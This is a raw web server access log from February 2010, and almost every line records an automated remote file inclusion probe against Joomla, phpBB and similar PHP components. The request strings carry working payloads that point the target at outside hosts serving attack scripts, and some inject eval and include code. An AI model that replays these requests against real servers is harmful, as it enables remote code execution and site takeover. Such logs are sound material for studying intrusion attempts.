64.15.152.132 - - [24/Feb/2010:05:09:51 -0800] "GET /delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:09:52 -0800] "GET /logs//delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:09:52 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:05:10:04 -0800] "GET /logs/access_100123.log//index.php?option=com_sitemap&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:10:16 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:10:23 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:10:23 -0800] "GET /logs/access_100209.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:10:23 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:05:10:26 -0800] "GET /logs/access_100217.log//index.php?option=com_sitemap&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:10:34 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:10:36 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:05:10:38 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:05:10:38 -0800] "GET /logs/access_100130.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:05:10:38 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:11:02 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:05:11:14 -0800] "GET /logs/access_100119.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:11:15 -0800] "GET /logs/access_100126.log/////?_SERVER[DOCUMENT_ROOT]=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:12:36 -0800] "GET /logs/access_100209.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:12:36 -0800] "GET /logs/access_100121.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:05:13:01 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:05:13:01 -0800] "GET /logs/access_100212.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:05:13:01 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:13:45 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [24/Feb/2010:05:14:29 -0800] "GET /logs/access_091220.log///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [24/Feb/2010:05:14:29 -0800] "GET //admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [24/Feb/2010:05:14:29 -0800] "GET /logs///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:14:31 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:14:31 -0800] "GET /logs/access_100219.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:14:31 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:14:31 -0800] "GET /logs/access_100218.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:14:52 -0800] "GET /common/db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:14:53 -0800] "GET /logs/access_100118.log%20%20/common/db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:14:53 -0800] "GET /logs/common/db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:15:08 -0800] "GET /logs/access_100121.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:15:13 -0800] "GET /logs/access_100209.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:15:23 -0800] "GET /logs/access_100209.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:15:23 -0800] "GET /logs/access_100121.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:15:31 -0800] "GET /logs/common/db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:15:31 -0800] "GET /common/db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:15:31 -0800] "GET /logs/access_100118.log%20%20/common/db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:05:16:31 -0800] "GET /logs/common/db.php?commonpath=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:05:16:31 -0800] "GET /logs/access_100118.log/common/db.php?commonpath=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:05:16:31 -0800] "GET /common/db.php?commonpath=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:05:17:34 -0800] "GET /logs/access_100214.log/common/db.php?commonpath=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:17:53 -0800] "GET /logs/access_100205.log%20%20//delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:17:53 -0800] "GET /logs//delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:17:54 -0800] "GET /delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:18:11 -0800] "GET /logs/access_100201.log/////?_SERVER[DOCUMENT_ROOT]=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:18:12 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt?? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:18:16 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt?? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:18:21 -0800] "GET /logs/access_100203.log%20%20//delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [24/Feb/2010:05:18:22 -0800] "GET /components/com_flyspray/startdown.php?file=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [24/Feb/2010:05:18:22 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [24/Feb/2010:05:18:22 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [24/Feb/2010:05:18:29 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:18:30 -0800] "GET /logs/access_100205.log%20%20//delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:18:30 -0800] "GET /logs//delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:18:31 -0800] "GET /delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [24/Feb/2010:05:18:48 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [24/Feb/2010:05:18:48 -0800] "GET /logs/access_100219.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [24/Feb/2010:05:18:48 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:18:59 -0800] "GET /logs/access_100203.log%20%20//delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:20:18 -0800] "GET /logs/access_100126.log/////?_SERVER[DOCUMENT_ROOT]=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:20:25 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:20:25 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:20:26 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:20:35 -0800] "GET /logs/access_100130.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:20:35 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:20:36 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:21:03 -0800] "GET /logs/access_100214.log%20%20/common/db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [24/Feb/2010:05:21:42 -0800] "GET /logs/access_100201.log///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:21:53 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:21:55 -0800] "GET /logs/access_100125.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:21:55 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.115.59 - - [24/Feb/2010:05:21:56 -0800] "GET /logs/?D=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:21:59 -0800] "GET /logs/access_100214.log%20%20/common/db.php?commonpath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:22:36 -0800] "GET /logs/access_100202.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [24/Feb/2010:05:22:52 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [24/Feb/2010:05:22:52 -0800] "GET /components/com_flyspray/startdown.php?file=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [24/Feb/2010:05:22:52 -0800] "GET /logs/access_100201.log%20%20//components/com_flyspray/startdown.php?file=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [24/Feb/2010:05:23:12 -0800] "GET /logs/access_100126.log///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.115.59 - - [24/Feb/2010:05:23:28 -0800] "GET /logs/access_100224.log HTTP/1.0" 200 1389217 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:23:36 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:23:36 -0800] "GET /logs/access_100125.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:23:36 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:23:37 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:23:39 -0800] "GET /logs/access_100125.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:23:39 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:24:06 -0800] "GET /logs/access_100202.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:24:19 -0800] "GET /logs/access_100202.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [24/Feb/2010:05:26:18 -0800] "GET /logs/access_100119.log%20%20//components/com_flyspray/startdown.php?file=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [24/Feb/2010:05:26:56 -0800] "GET /logs/access_100128.log//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [24/Feb/2010:05:26:56 -0800] "GET /write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [24/Feb/2010:05:26:56 -0800] "GET /logs//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [24/Feb/2010:05:27:41 -0800] "GET /logs/access_100125.log//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:27:44 -0800] "GET /logs/access_100205.log%20%20//delete_all.php?board_skin_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:27:44 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:27:44 -0800] "GET /delete_all.php?board_skin_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:27:51 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:27:51 -0800] "GET /logs/access_100218.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:27:54 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:28:19 -0800] "GET /logs/access_100130.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:28:20 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:28:21 -0800] "GET /logs/access_100209.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:28:24 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
